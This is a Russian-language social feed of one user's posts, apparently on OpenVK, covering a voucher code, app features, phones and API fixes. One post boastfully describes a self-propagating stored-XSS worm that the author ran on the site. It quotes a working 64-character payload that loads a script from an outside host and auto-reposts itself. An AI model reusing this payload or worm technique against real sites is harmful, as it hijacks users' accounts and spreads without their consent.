Вячеслав Петров написал 8 марта 2023 в 03:52 С 8 марта пацаны C8MAPT-AREBYA-TAGUYS-GIFTSS - ваучер Комментарии  |  Поделиться 5

Вячеслав Петров написал 5 марта 2023 в 18:49 да, в приложении на iOS можно теперь просматривать ленту новостей и отправлять посты Комментарии (1)  |  Поделиться 6

Вячеслав Петров написал 5 марта 2023 в 18:39 Хочу себе моторолу razr v3 Motorola RAZR V3 commercial Комментарии  |  Поделиться 3

Вячеслав Петров написал 3 марта 2023 в 20:54 Пишу пост с iPhone 5 на iOS 6 Комментарии  |  Поделиться 5

Вячеслав Петров написал 23 февраля 2023 в 23:35 Сегодня ровно год с начала Россией полномаштабной войны в Украине День изменивший всё Данное видео автором который является Никита Фёдоров (t.me/nikoordinate) не нарушает КоАП РФ 20.3.3 и не дискредитирует ВС РФ а только воссоздаёт реальные кадры Вторжение в Украину — История в Майнкрафте Комментарии  |  Поделиться 6

Вячеслав Петров написал 22 февраля 2023 в 23:26 Сделал вот такой баннер, как вам? Комментарии (1)  |  Поделиться 12

Вячеслав Петров написал 18 февраля 2023 в 21:25 Комментарии (4)  |  Поделиться 7

Вячеслав Петров написал 18 февраля 2023 в 13:19 Unnamed Video.mp4 Комментарии  |  Поделиться 6

Вячеслав Петров написал 10 февраля 2023 в 08:32 Этой ночью нашли критическую уязвимость в нововведённом видео-плеере, в последствии чего в глобальной ленты OpenVK творилась вакханалия Уязвимость заключалась в отсутствии фильтрации названия видео, после его редактирования и позволяла она вставить туда любой пользовательский javascript код, чем мы и решили воспользоваться! Всё бы хорошо, но почти сразу мы наткнулись на проблему - лимит ровно в 64 символа. Нам необходимо было построить цепочку эксплоитов, которая сама себя встроит в html код страницы и сможет распространяться самостоятельно, как червь (Хотя мы назвали это гидрой, расскажем почему чуть позже), спустя несколько часов перебора вариантов, мы максимально сильно ужали точку входа в наш скрипт(из-за такого подхода ломался интерфейс плеера, так как нам приходилось убирать некоторые кусочки html кода для вмещения в лимит символов). Не будем тянуть, представляю вам магнум опус этого взлома, код загружающий внешний скрипт на страницу, длинной ровно в 64 символа: <audio src/onerror="$(body).append('<script src=//sdzk.xyz/a>')" Скрипт создавал на в html коде страницы тег script, ссылающийся на этот код: pastebin.com/maewTdPT Этот код работает достаточно просто, он берёт хэш прямо с кода страницы(он нужен для работы бекенда) и с ним в качестве аргумента делает репост записи с видео, у которого в названии та самая строчка из 64 символов. Ну и теперь следите за руками, сейчас я вам покажу секрет фокуса! Каждый человек, заходя в новости, прогружал плеер с вредоносным кодом(обычно даже не один), что вызывало цепочку скриптов на странице и как следствие, делала репосты на стену пользователя, которые в последствии попадались другим пользователям. Самое смешное, если у пользователя на собственной стене было хотя-бы два репоста, то избавиться от них было просто невозможно, удаление одного поста вызывало перезагрузку страницы и повторное исполнение цепочки скриптов, потому мы и назвали её гидрой, потому что убить её можно было только уничтожив все репосты разом через БД что конечно подсилу только админам Пост с этим видео набрал за ночь 1534 репоста XSS уязвимость Комментарии (1)  |  Поделиться 10

Вячеслав Петров написал 9 февраля 2023 в 18:03 Была закрыта дыра в API которая позволяла писать посты и сообщения с заблокированного аккаунта Комментарии  |  Поделиться 6